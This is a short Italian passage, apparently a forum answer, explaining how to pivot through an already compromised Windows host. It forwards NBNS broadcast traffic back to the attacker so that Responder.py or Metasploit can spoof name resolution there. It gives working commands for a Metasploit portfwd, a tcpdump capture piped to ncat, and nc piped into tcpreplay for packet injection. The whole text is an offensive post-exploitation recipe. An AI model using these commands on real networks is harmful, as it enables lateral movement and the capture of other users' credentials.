poiché sia responder.py
che metasploit ascoltano sul computer host per i pacchetti broadcast nbns necessari per convincerli a far parte della propria rete. (supponendo che le risposte siano create come socket udp, altrimenti dovrai modificare anche quel codice)
il modo in cui li ingannerei è utilizzando tcpdump
con un nc sulla macchina remota e lo streaming direttamente nell'interfaccia usando tcpreply
.
è necessario inoltrare una porta dall'host remoto a te, questo dovrebbe essere abbastanza semplice utilizzando il port forwarding di metasploit, è necessario associare una porta locale all'host locale sul computer remoto.
all'interno di metasploit:
portfwd -l 1234 -p 1234 -r 127.0.0.1
in seguito è necessario utilizzare ncat
e tcpdump
sulla macchina remota in modo che il traffico nbns venga inoltrato a te (nota che il filtro dovrebbe rimuovere i pacchetti che verranno iniettati, altrimenti avrai un ciclo) :
tcpdump -i [interface number] -vv -s 0 port 137 and ether host ff:ff:ff:ff:ff:ff|ncat -l 127.0.0.1 1234
e quindi è necessario inserirlo nella propria interfaccia, nc
è utilizzato per lo streaming da ncat
sull'host di windows e tcpreply
viene utilizzato per iniettare i pacchetti:
nc 127.0.0.1 1234 | tcpreply -i lo -
ed esegui il tuo metasploit/responder.py
nell'interfaccia lo
.